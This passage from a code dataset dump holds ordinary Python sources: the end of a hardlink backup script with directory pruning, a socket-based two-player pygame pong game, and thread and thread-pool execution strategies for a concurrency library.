s_info = os.stat(file_path)
with id_lock:
if s_info.st_ino not in file_ids:
file_ids.add(s_info.st_ino)
delete_queue.put(file_path)
walk_queue.task_done()
def remove_tree(path):
log_msg('Remove tree: {}'.format(path))
delete_queue = queue.Queue()
file_ids = set()
walk_queue = queue.Queue()
id_lock = threading.Lock()
log_msg('Generating deletion list.')
for (dpath, dnames, fnames) in os.walk(path):
for file_name in fnames:
file_path = os.path.join(dpath, file_name)
walk_queue.put(file_path)
log_msg('Walk list size: {}'.format(walk_queue.qsize()))
run_threaded(walk_tree_worker, (walk_queue, delete_queue, file_ids, id_lock))
log_msg('Delete list size {}'.format(delete_queue.qsize()))
run_threaded(remove_tree_worker, (delete_queue, path))
try:
shutil.rmtree(path, True)
except OSError as error:
log_msg('Exception removing tree {}, {}'.format(path, str(error)))
def delete_excess(dest_dir, dest_hashes_csv, max_backup_count):
subdirs = []
dir_list = os.scandir(dest_dir)
for dir_entry in dir_list:
if dir_entry.is_dir():
subdirs.append(dir_entry.name)
log_msg('Checking excess. Max count: {}, directory count: {}'.format(max_backup_count, len(subdirs)))
if len(subdirs) > max_backup_count:
subdirs.sort()
subdirs = subdirs[:len(subdirs) - max_backup_count]
hash_dest = {}
populate_name_dict(hash_dest, dest_hashes_csv, False)
for subdir in subdirs:
path_prefix = os.path.join(dest_dir, subdir)
log_msg('Removing directory: {}'.format(path_prefix))
deletions = []
additions = []
for key, value in hash_dest.items():
if key.startswith(path_prefix):
deletions.append(key)
links = get_hardlinks(key)
if links:
for link in reversed(links):
if not link.startswith(path_prefix):
value.path = link
additions.append((value.path, value))
break
for del_path in deletions:
hash_dest.pop(del_path)
for add_tuple in additions:
hash_dest[add_tuple[0]] = add_tuple[1]
# write the new hash list before attempting delete, in case of an error
write_file_infos(hash_dest, dest_hashes_csv)
remove_tree(path_prefix)
def print_help():
print('backup.py - Backup with hardlinks')
print('python backup.py config_file [-help]')
print('This script maintains a catalog of hashes on the backup source and target. When creating a new backup file '
'this allows us to hardlink the new files rather than copying a new set of bits. The first backup set '
'consumes the full size, but later sets only use space for new or changed content. Unchanged files only '
'require a hardlink\n')
print('Options are stored in a yaml config file. All path comparisons are case sensitive. You must write any path '
'exactly as the OS presents it.')
print('sources: Required. A yaml string list of source directories. Each directory is fully traversed during the '
'backup.')
print('dest: Required. The path to the backup destination. Backups become subdirectories as YYYY-MM-DD. ')
print('source_hashes: Required. A csv file to load and store source file info. Each source file has hash, size, and'
' timestamps. Size and timestamps are used to avoid rehashing. Can be non-existent at first, the script will '
'generate it as needed. It should never be edited, the script will read and write it as needed.')
print('dest_hashes: Required. A csv file to load and store destination file info. Each unique hash in the target '
'area is tracked with path, hash, size, and timestamps. When a source file matches a target hash, a hardlink '
'is created instead of a full copy. Size and timestamps are used to check for changes at start. Can be '
'non-existent at first, the script will generate it as needed. It should never be edited, the script will '
'read and write it as needed.')
print('sources_file: Optional. Pull the sources list from a separate yaml file. This will add any entries to '
'the local "sources:", "delta_files:", and "latest_only_dirs:". Useful when multiple backup sets need the '
'same source list.')
print('delta_files: Optional. A yaml string list of files to generate a binary delta of. Very useful for large mail'
' store files. At first, a full copy of the file is made. On subsequent backups, if a full version is found '
'in the earlier backups then a binary delta from the earlier full version is stored. Given the YYYY-MM-DD '
'format, the routine looks for YYYY-MM-??, basically any full copy within the current month. This option '
'requires the utility xdelta3.exe to be on the path. This option is incompatible with "use_date: false"')
print('use_date: Optional, default true. true or false. Sets whether a date encoded subdirectory should be created '
'under the dest: directory. Useful if copying a set of already dated archives to a new destination')
print('always_hash_source: Optional, default false. If true, source files are hashed every time. If false, size and'
' timestamps are used to determine if a source file has changed.')
print('always_hash_target: Optional, default false. If true, at start hash targets in the dest directory are '
'rehashed to confirm our current hash information is correct. Only the unique hash targets (not all files) '
'are hashed. If false, size and timestamps are used to determine if a target file has changed.')
print('latest_only_dirs: Optional. If any of these directories are traversed, only the single latest file is '
'included. All other files are skipped. Useful for log or backup directories for other software.')
print('max_backup_count: Optional. Numeric. If set, when the backup count (as counted by the number of '
'subdirectories under the "dest:" directory) exceeds this number the oldest directories are removed. This '
'option requires the backup directories lexicographically sort in date order. Timestamps are not used. Any '
'hash targets in the directories to be removed are repointed to existing hardlinks or removed from the list '
'if no other hardlinks exist.')
print('thread_count')
def main():
parser = argparse.ArgumentParser(description='Backup with hardlinks')
parser.add_argument('config_file', help='Path to configuration yaml file')
parser.add_argument('-help', help='Print detailed help information',
action='store_true')
parser.add_argument('-date_override', help='Text to override date string. Used for script testing')
parser.add_argument('-no_backup', action='store_true', help='Skip backup, do delete check. Used for testing')
args = parser.parse_args()
if args.help:
print_help()
elif args.config_file:
with open(args.config_file, 'r') as stream:
config = yaml.safe_load(stream)
if 'sources_file' in config:
print('Using sources file: {}'.format(config['sources_file']))
with open(config['sources_file'], 'r') as stream:
sources = yaml.safe_load(stream)
if 'sources' in sources:
if 'sources' in config:
config['sources'].append(sources['sources'])
else:
config['sources'] = sources['sources']
if 'delta_files' in sources:
if 'delta_files' in config:
config['delta_files'].extend(sources['delta_files'])
else:
config['delta_files'] = sources['delta_files']
if 'compressed_files' in sources:
if 'compressed_files' in config:
config['compressed_files'].extend(sources['compressed_files'])
else:
config['compressed_files'] = sources['compressed_files']
if 'latest_only_dirs' in sources:
if 'latest_only_dirs' in config:
config['latest_only_dirs'].extend(sources['latest_only_dirs'])
else:
config['latest_only_dirs'] = sources['latest_only_dirs']
if 'dest' in config and 'sources' in config and 'dest_hashes' in config and 'source_hashes' in config:
use_date = True
if 'use_date' in config and not config['use_date']:
use_date = False
if use_date:
if args.date_override:
date_string = args.date_override
else:
date_string = date.today().strftime('%Y-%m-%d')
backup_dir = os.path.join(config['dest'], date_string)
else:
backup_dir = config['dest']
if (not use_date) and 'delta_files' in config and len(config['delta_files']) > 0:
print('Setting use_date: false and having delta_files is incompatible. Exiting.')
sys.exit(1)
always_hash_source = False
if 'always_hash_source' in config and config['always_hash_source']:
always_hash_source = True
always_hash_target = False
if 'always_hash_target' in config and config['always_hash_target']:
always_hash_target = True
latest_only_dirs = []
if 'latest_only_dirs' in config:
latest_only_dirs = config['latest_only_dirs']
# if 'thread_count' in config:
# thread_count = config['thread_count']
print('dest: {}'.format(config['dest']))
print('sources: {}'.format(config['sources']))
print('dest_hashes: {}'.format(config['dest_hashes']))
print('source_hashes: {}'.format(config['source_hashes']))
print('use_date: {}'.format(use_date))
print('always_hash_source: {}'.format(always_hash_source))
print('always_hash_target: {}'.format(always_hash_target))
print('latest_only_dirs: {}'.format(latest_only_dirs))
print('backup directory: {}'.format(backup_dir))
if 'max_backup_count' in config:
print('max_backup_count: {}'.format(config['max_backup_count']))
else:
print('max_backup_count: not set')
print('no_backup: {}'.format(args.no_backup))
# print('thread_count: {}'.format(thread_count))
os.makedirs(backup_dir, exist_ok=True)
new_files = 0
new_bytes = 0
skip_files = []
counts = (0, 0)
if not args.no_backup:
if 'delta_files' in config:
log_msg('delta_files: {}'.format(config['delta_files']))
# since we made a delta of the file, make sure we skip it during the actual backup
# it's possible the delta file is included in the traversal of the main backup
skip_files.extend(config['delta_files'])
try:
counts = generate_delta_files(backup_dir, config['delta_files'])
new_files += counts[0]
new_bytes += counts[1]
except OSError as error:
log_msg('Failure generating delta files. {}'.format(str(error)))
if 'compressed_files' in config:
log_msg('compressed_files: {}'.format(config['compressed_files']))
# since we made a zip of the file, make sure we skip it during the actual backup
# it's possible the zip file is included in the traversal of the main backup
skip_files.extend(config['compressed_files'])
try:
counts = generate_compressed_files(backup_dir, config['compressed_files'])
new_files += counts[0]
new_bytes += counts[1]
except OSError as error:
log_msg('Failure generating compressed files. {}'.format(str(error)))
counts = do_backup(backup_dir, config['sources'], config['dest_hashes'], config['source_hashes'],
latest_only_dirs, skip_files, always_hash_source, always_hash_target)
if 'max_backup_count' in config:
delete_excess(config['dest'], config['dest_hashes'], config['max_backup_count'])
new_files += counts[0]
new_bytes += counts[1]
log_msg('New files: {:,}, bytes: {:,}'.format(new_files, new_bytes))
else:
print('Config file missing required values. No backup.')
else:
print('No config file specified.')
print_help()
sys.exit(0)
if __name__ == "__main__":
# execute only if run as a script
main()
|
pingpong.py
|
import socket
import os
import pygame
import threading
import random
import sys
class PingPongException(Exception):
pass
class Server:
def __init__(self):
self.HOST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.PORT = 12000
self.hostName = socket.gethostname()
self.hostAddress = socket.gethostbyname(self.hostName)
def openServer(self):
server_address = (self.hostAddress, self.PORT)
try:
self.HOST.bind(server_address)
self.HOST.listen(1)
print("Server is open")
return 0
except IndexError:
print(server_address, "is not valid")
return 1
except OSError:
print(server_address, "is already in use")
return 2
class Client:
def __init__(self):
self.HOST = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.PORT = 12000
self.hostName = socket.gethostname()
self.hostAddress = socket.gethostbyname(self.hostName)
def connect(self):
while True:
IP = input("Address: ") # self.hostAddress
PORT = int(input("Port: ")) # self.PORT
try:
self.HOST.connect((IP, PORT))
print("Connected to", (IP, PORT))
break
except ConnectionRefusedError:
print((IP, PORT), "refused to connect")
except IndexError:
print((IP, PORT), "is not valid")
except OSError:
print((IP, PORT), "is not valid")
def showInfo(port):
hostName = socket.gethostname()
hostAddress = socket.gethostbyname(hostName)
print("Host Name:", hostName, "\n-----------------------")
print("Your IP:", hostAddress)
print("Your PORT:", port, "\n-----------------------")
def showDeviceInfo():
defaultPort = 12000
if sys.platform == 'win32':
os.system("cls")
else:
os.system("clear")
showInfo(defaultPort)
def Prompt():
connection = Server()
while True:
command = input("PingPongShell> ")
if command == "openserver":
connection.openServer()
while True:
client, address = connection.HOST.accept()
if client: # if client is connected
print("Connected by", address)
return connection.HOST, client
elif command == "connect":
connection = Client()
connection.connect()
break
elif command == "exit" or command == "quit":
userEvent = "The user exited the shell."
raise PingPongException(userEvent)
elif command == "help":
print("""Commands:
openserver - Opens a server
connect - Connects to an existing server
exit/quit - Exits the shell
help - Prints this help page""")
else:
print("Command '" + command + "' not found\nType 'help' for help.\n")
return connection.HOST, False
# Only run on server
class Ball:
def __init__(self, surface):
self.radius = 10
self.interface = surface
self.WIDTH, self.HEIGHT = pygame.display.get_surface().get_size()
self.location = [self.WIDTH // 2, self.HEIGHT // 2]
step = 5
self.speed = [random.choice((step, -step)), random.choice((step, -step))]
self.player_point = 0
def isCollision(self, player, competitor, top, bottom, left, right):
if self.location[0] <= left + self.radius: # collision with left edge of screen
self.speed[0] = -self.speed[0]
elif self.location[0] >= right - self.radius: # collision with right edge of screen
self.speed[0] = -self.speed[0]
self.player_point += 1
# collision with top and bottom edge of screen
elif self.location[1] <= top + self.radius or self.location[1] >= bottom - self.radius:
self.speed[1] = -self.speed[1]
# objects collision
elif self.location[0] <= player.location[0] + player.WIDTH + self.radius: # player
if player.location[1] <= self.location[1] <= player.location[1] + player.HEIGHT:
self.speed[0] = -self.speed[0]
elif self.location[0] >= competitor.location[0] - self.radius: # competitor
if competitor.location[1] <= self.location[1] <= competitor.location[1] + competitor.HEIGHT:
self.speed[0] = -self.speed[0]
def render(self):
WHITE = (255, 255, 255)
pygame.draw.circle(self.interface, WHITE, self.location, self.radius)
class Player:
def __init__(self, surface):
self.WIDTH, self.HEIGHT = 10, 100
self.location = [30, 30]
self.interface = surface
self.speed = 5
self.point = 0
def sendRequest(self, host, ball_location):
try:
location = "%s %s %s %s" % (self.location[1], ball_location[0], ball_location[1], self.point)
host.sendall(location.encode("utf-8"))
except ConnectionResetError:
print("Partner is disconnected")
pygame.quit()
except ConnectionAbortedError:
print("Your partner software has some errors")
pygame.quit()
def render(self):
AQUA = (0, 255, 255)
pygame.draw.rect(self.interface, AQUA, (self.location[0], self.location[1], self.WIDTH, self.HEIGHT))
class Competitor:
def __init__(self, surface):
self.WIDTH, self.HEIGHT = 10, 100
self.location = [970, 30]
self.interface = surface
self.SCREEN_WIDTH, self.SCREEN_HEIGHT = self.interface.get_size()
self.speed = 5
self.ball_location = [10, 10]
self.point = 0
self.requestErrors = 0
def handleRequest(self, client):
try:
data_received = client.recv(128).decode("utf-8")
location = data_received.split()
self.location[1] = int(location[0])
# ball_location[0] = midOfScreen + (midOfScreen - competitor_location)
self.ball_location[0] = self.SCREEN_WIDTH // 2 + (self.SCREEN_WIDTH // 2 - int(location[1]))
self.ball_location[1] = int(location[2])
self.point = int(location[3])
except ConnectionResetError:
print("The competitor disconnected")
self.requestErrors = 1
except ConnectionAbortedError:
print("The competitor has issues with their thread")
self.requestErrors = 2
except BrokenPipeError:
print("The competitor disconnected")
self.requestErrors = 1
except IndexError:
print("The competitor disconnected")
self.requestErrors = 1
def render(self):
SALMON = (250, 128, 114)
pygame.draw.rect(self.interface, SALMON, (self.location[0], self.location[1], self.WIDTH, self.HEIGHT))
class PingPong:
init_directory = os.path.dirname(__file__)
def __init__(self):
self.WIDTH, self.HEIGHT = 1000, 500
self.screen = None
if sys.platform == 'win32':
icon = pygame.image.load("icon.png")
else:
icon = pygame.image.load(os.path.join(PingPong.init_directory, "icon.png"))
pygame.display.set_icon(icon)
def renderScoreBoard(self, player_point, competitor_point):
GREY = (128, 128, 128)
MIDDLE = [self.WIDTH // 2, self.HEIGHT // 2]
locate = 50
player_point = str(player_point)
competitor_point = str(competitor_point)
font = os.path.join(PingPong.init_directory, "cour.ttf")
size = 48
render_font = pygame.font.Font(font, size)
renderPlayerPoint = render_font.render(player_point, True, GREY)
renderCompetitorPoint = render_font.render(competitor_point, True, GREY)
self.screen.blit(renderPlayerPoint, (MIDDLE[0] - (2 * locate), MIDDLE[1] - (locate // 4)))
self.screen.blit(renderCompetitorPoint, (MIDDLE[0] + locate, MIDDLE[1] - (locate // 4)))
def start(self):
pygame.init()
frame = pygame.time.Clock()
FPS = 60
host, server = Prompt()
self.screen = pygame.display.set_mode((self.WIDTH, self.HEIGHT))
if server: # server
pygame.display.set_caption("Ping Pong ! Server")
host = server
else: # client
pygame.display.set_caption("Ping Pong ! Client")
gameOver = False
player = Player(self.screen)
competitor = Competitor(self.screen)
ball = Ball(self.screen)
BLACK = (0, 0, 0)
TOP, BOTTOM, LEFT, RIGHT = 0, self.HEIGHT, 0, self.WIDTH
while not gameOver:
self.screen.fill(BLACK)
for event in pygame.event.get():
if event.type == pygame.QUIT:
gameOver = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameOver = True
# player moving
moving = pygame.key.get_pressed()
if moving[pygame.K_w] or moving[pygame.K_a] or moving[pygame.K_UP] or moving[pygame.K_RIGHT]:
player.location[1] -= player.speed
elif moving[pygame.K_s] or moving[pygame.K_d] or moving[pygame.K_DOWN] or moving[pygame.K_LEFT]:
player.location[1] += player.speed
if player.location[1] <= TOP:
player.location[1] = TOP
elif player.location[1] >= BOTTOM - player.HEIGHT:
player.location[1] = BOTTOM - player.HEIGHT
# if this host is server
if server:
# if ball is collision
ball.location[0] += ball.speed[0]
ball.location[1] += ball.speed[1]
else:
ball.location = competitor.ball_location
ball_parameters = (player, competitor, TOP, BOTTOM, LEFT, RIGHT)
ball_collision = threading.Thread(target=ball.isCollision, args=ball_parameters)
handling = threading.Thread(target=competitor.handleRequest, args=(host,))
sending = threading.Thread(target=player.sendRequest, args=(host, ball.location))
handling.start()
sending.start()
ball_collision.start()
if competitor.requestErrors:
break
player.point = ball.player_point
self.renderScoreBoard(player.point, competitor.point)
ball.render()
player.render()
competitor.render()
frame.tick(FPS)
pygame.display.update()
host.close()
pygame.quit()
if __name__ == "__main__":
game = PingPong()
showDeviceInfo()
while True:
game.start()
|
strategy.py
|
from multiprocessing.pool import AsyncResult, ApplyResult
from multiprocessing.pool import ThreadPool
from multipledispatch import dispatch
from collections.abc import Iterable
from threading import Thread, current_thread
from functools import wraps, partial as PartialFunction
from typing import List, Dict, Callable, Iterable as IterableType, Optional, Union, Tuple
from types import FunctionType, MethodType
from abc import ABC
from os import getpid
from ..framework.runnable import (
MRResult as _MRResult,
GeneralRunnableStrategy as _GeneralRunnableStrategy,
PoolRunnableStrategy as _PoolRunnableStrategy,
Resultable as _Resultable,
ResultState as _ResultState
)
from ..framework.factory import (
BaseFeatureAdapterFactory as _BaseFeatureAdapterFactory,
BaseList as _BaseList
)
from ..framework import BaseQueueTask as _BaseQueueTask
from ..concurrent.result import ConcurrentResult as _ConcurrentResult, ThreadPoolResult as _ThreadPoolResult
from ..types import MRTasks as _MRTasks
from ..mode import FeatureMode as _FeatureMode
from .. import PYTHON_MAJOR_VERSION, PYTHON_MINOR_VERSION
class ConcurrentStrategy(_Resultable, ABC):
_Strategy_Feature_Mode = _FeatureMode.Concurrent
_Thread_Running_Result: List[Dict[str, Union[AsyncResult, bool]]] = []
@classmethod
def save_return_value(cls, function: Callable) -> Callable:
__self = cls
@wraps(function)
def save_value_fun(*args, **kwargs) -> None:
_current_thread = current_thread()
if (PYTHON_MAJOR_VERSION, PYTHON_MINOR_VERSION) >= (3, 8):
_thread_result = {
"pid": getpid(),
"name": _current_thread.name,
"ident": _current_thread.ident,
"native_id": _current_thread.native_id
}
else:
_thread_result = {
"pid": getpid(),
"name": _current_thread.name,
"ident": _current_thread.ident
}
try:
value = function(*args, **kwargs)
except Exception as e:
_thread_result.update({
"successful": False,
"exception": e
})
else:
_thread_result.update({
"result": value,
"successful": True
})
finally:
__self._Thread_Running_Result.append(_thread_result)
return save_value_fun
def result(self) -> List[_ConcurrentResult]:
__concurrent_result = self._saving_process()
self.reset_result()
return __concurrent_result
def reset_result(self):
self._Thread_Running_Result[:] = []
class ThreadStrategy(ConcurrentStrategy, _GeneralRunnableStrategy):
_Strategy_Feature_Mode: _FeatureMode = _FeatureMode.Concurrent
__Thread_List: List[Thread] = None
def initialization(self, queue_tasks: Optional[Union[_BaseQueueTask, _BaseList]] = None,
features: Optional[Union[_BaseFeatureAdapterFactory, _BaseList]] = None,
*args, **kwargs) -> None:
super(ThreadStrategy, self).initialization(queue_tasks=queue_tasks, features=features, *args, **kwargs)
@dispatch((FunctionType, MethodType, PartialFunction), args=tuple, kwargs=dict)
def _start_new_worker(self, target: Callable, args: Tuple = (), kwargs: Dict = {}) -> Thread:
__worker = self.generate_worker(target, *args, **kwargs)
self.activate_workers(__worker)
return __worker
@dispatch(Iterable, args=tuple, kwargs=dict)
def _start_new_worker(self, target: List[Callable], args: Tuple = (), kwargs: Dict = {}) -> List[Thread]:
__workers = [self.generate_worker(__function, *args, **kwargs) for __function in target]
self.activate_workers(__workers)
return __workers
def generate_worker(self, target: Callable, *args, **kwargs) -> _MRTasks:
@wraps(target)
@ConcurrentStrategy.save_return_value
def _target_function(*_args, **_kwargs):
result_value = target(*_args, **_kwargs)
return result_value
return Thread(target=_target_function, args=args, kwargs=kwargs)
@dispatch(Thread)
def activate_workers(self, workers: Thread) -> None:
workers.start()
@dispatch(Iterable)
def activate_workers(self, workers: List[Thread]) -> None:
for worker in workers:
self.activate_workers(worker)
@dispatch(Thread)
def close(self, workers: Thread) -> None:
workers.join()
@dispatch(Iterable)
def close(self, workers: List[Thread]) -> None:
for worker in workers:
self.close(worker)
def get_result(self) -> List[_MRResult]:
return self.result()
def _saving_process(self) -> List[_ConcurrentResult]:
__concurrent_results = []
for __result in self._Thread_Running_Result:
_cresult = _ConcurrentResult()
# # # # Save some basic info of Process
_cresult.pid = __result["pid"]
_cresult.worker_name = __result["name"]
_cresult.worker_ident = __result["ident"]
if PYTHON_MAJOR_VERSION == 3 and PYTHON_MINOR_VERSION >= 8:
_cresult.native_id = __result["native_id"]
# # # # Save state of process
__concurrent_successful = __result.get("successful", None)
if __concurrent_successful is True:
_cresult.state = _ResultState.SUCCESS.value
else:
_cresult.state = _ResultState.FAIL.value
# # # # Save running result of process
_cresult.data = __result.get("result", None)
_cresult.exception = __result.get("exception", None)
__concurrent_results.append(_cresult)
return __concurrent_results
class ThreadPoolStrategy(ConcurrentStrategy, _PoolRunnableStrategy, _Resultable):
_Thread_Pool: ThreadPool = None
_Thread_List: List[Union[ApplyResult, AsyncResult]] = None
def __init__(self, pool_size: int):
super().__init__(pool_size=pool_size)
def initialization(self, queue_tasks: Optional[Union[_BaseQueueTask, _BaseList]] = None,
features: Optional[Union[_BaseFeatureAdapterFactory, _BaseList]] = None,
*args, **kwargs) -> None:
super(ThreadPoolStrategy, self).initialization(queue_tasks=queue_tasks, features=features, *args, **kwargs)
# Initialize and build the Processes Pool.
__pool_initializer: Callable = kwargs.get("pool_initializer", None)
__pool_initargs: IterableType = kwargs.get("pool_initargs", None)
self._Thread_Pool = ThreadPool(processes=self.pool_size, initializer=__pool_initializer, initargs=__pool_initargs)
def apply(self, tasks_size: int, function: Callable, args: Tuple = (), kwargs: Dict = {}) -> None:
self.reset_result()
__process_running_result = None
self._Thread_List = [
self._Thread_Pool.apply(func=function, args=args, kwds=kwargs)
for _ in range(tasks_size)]
for thread in self._Thread_List:
try:
__process_running_result = thread
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
self._result_saving(successful=__process_run_successful, result=__process_running_result, exception=__exception)
def async_apply(self, tasks_size: int, function: Callable, args: Tuple = (),
kwargs: Dict = {}, callback: Callable = None, error_callback: Callable = None) -> None:
self.reset_result()
self._Thread_List = [
self._Thread_Pool.apply_async(func=function,
args=args,
kwds=kwargs,
callback=callback,
error_callback=error_callback)
for _ in range(tasks_size)]
for process in self._Thread_List:
_process_running_result = None
_process_run_successful = None
_exception = None
try:
_process_running_result = process.get()
_process_run_successful = process.successful()
except Exception as e:
_exception = e
_process_run_successful = False
# Save Running result state and Running result value as dict
self._result_saving(successful=_process_run_successful, result=_process_running_result, exception=_exception)
def apply_with_iter(self, functions_iter: List[Callable], args_iter: List[Tuple] = None, kwargs_iter: List[Dict] = None) -> None:
self.reset_result()
__process_running_result = None
if args_iter is None:
args_iter = [() for _ in functions_iter]
if kwargs_iter is None:
kwargs_iter = [{} for _ in functions_iter]
self._Thread_List = [
self._Thread_Pool.apply(func=_func, args=_args, kwds=_kwargs)
for _func, _args, _kwargs in zip(functions_iter, args_iter, kwargs_iter)
]
for thread in self._Thread_List:
try:
__process_running_result = thread
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
self._result_saving(successful=__process_run_successful, result=__process_running_result, exception=__exception)
def async_apply_with_iter(self, functions_iter: List[Callable], args_iter: List[Tuple] = None,
kwargs_iter: List[Dict] = None, callback_iter: List[Callable] = None,
error_callback_iter: List[Callable] = None) -> None:
self.reset_result()
if args_iter is None:
args_iter = [() for _ in functions_iter]
if kwargs_iter is None:
kwargs_iter = [{} for _ in functions_iter]
if callback_iter is None:
callback_iter = [None for _ in functions_iter]
if error_callback_iter is None:
error_callback_iter = [None for _ in functions_iter]
self._Thread_List = [
self._Thread_Pool.apply_async(
func=_func,
args=_args,
kwds=_kwargs,
callback=_callback)
for _func, _args, _kwargs, _callback in zip(functions_iter, args_iter, kwargs_iter, callback_iter)
]
for process in self._Thread_List:
_process_running_result = None
_process_run_successful = None
_exception = None
try:
_process_running_result = process.get()
_process_run_successful = process.successful()
except Exception as e:
_exception = e
_process_run_successful = False
# Save Running result state and Running result value as dict
self._result_saving(successful=_process_run_successful, result=_process_running_result, exception=_exception)
def map(self, function: Callable, args_iter: IterableType = (), chunksize: int = None) -> None:
self.reset_result()
__process_running_result = None
try:
__process_running_result = self._Thread_Pool.map(
func=function, iterable=args_iter, chunksize=chunksize)
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def async_map(self, function: Callable, args_iter: IterableType = (), chunksize: int = None,
callback: Callable = None, error_callback: Callable = None) -> None:
self.reset_result()
__map_result = self._Thread_Pool.map_async(
func=function,
iterable=args_iter,
chunksize=chunksize,
callback=callback,
error_callback=error_callback)
__process_running_result = __map_result.get()
__process_run_successful = __map_result.successful()
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def map_by_args(self, function: Callable, args_iter: IterableType[IterableType] = (), chunksize: int = None) -> None:
self.reset_result()
__process_running_result = None
try:
__process_running_result = self._Thread_Pool.starmap(
func=function, iterable=args_iter, chunksize=chunksize)
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def async_map_by_args(self, function: Callable, args_iter: IterableType[IterableType] = (),
chunksize: int = None, callback: Callable = None, error_callback: Callable = None) -> None:
self.reset_result()
__map_result = self._Thread_Pool.starmap_async(
func=function,
iterable=args_iter,
chunksize=chunksize,
callback=callback,
error_callback=error_callback)
__process_running_result = __map_result.get()
__process_run_successful = __map_result.successful()
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def imap(self, function: Callable, args_iter: IterableType = (), chunksize: int = 1) -> None:
self.reset_result()
__process_running_result = None
try:
imap_running_result = self._Thread_Pool.imap(func=function, iterable=args_iter, chunksize=chunksize)
__process_running_result = [result for result in imap_running_result]
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def imap_unordered(self, function: Callable, args_iter: IterableType = (), chunksize: int = 1) -> None:
self.reset_result()
__process_running_result = None
try:
imap_running_result = self._Thread_Pool.imap_unordered(func=function, iterable=args_iter, chunksize=chunksize)
__process_running_result = [result for result in imap_running_result]
__exception = None
__process_run_successful = True
except Exception as e:
__exception = e
__process_run_successful = False
# Save Running result state and Running result value as dict
for __result in (__process_running_result or []):
self._result_saving(successful=__process_run_successful, result=__result, exception=None)
def _result_saving(self, successful: bool, result: List, exception: Exception) -> None:
_thread_result = {"successful": successful, "result": result, "exception": exception}
# Saving value into list
self._Thread_Running_Result.append(_thread_result)
def close(self) -> None:
self._Thread_Pool.close()
self._Thread_Pool.join()
def terminal(self) -> None:
self._Thread_Pool.terminate()
def get_result(self) -> List[_ConcurrentResult]:
return self.result()
def _saving_process(self) -> List[_ThreadPoolResult]:
_pool_results = []
for __result in self._Thread_Running_Result:
_pool_result = _ThreadPoolResult()
_pool_result.is_successful = __result["successful"]
_pool_result.data = __result["result"]
_pool_results.append(_pool_result)
return _pool_results
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.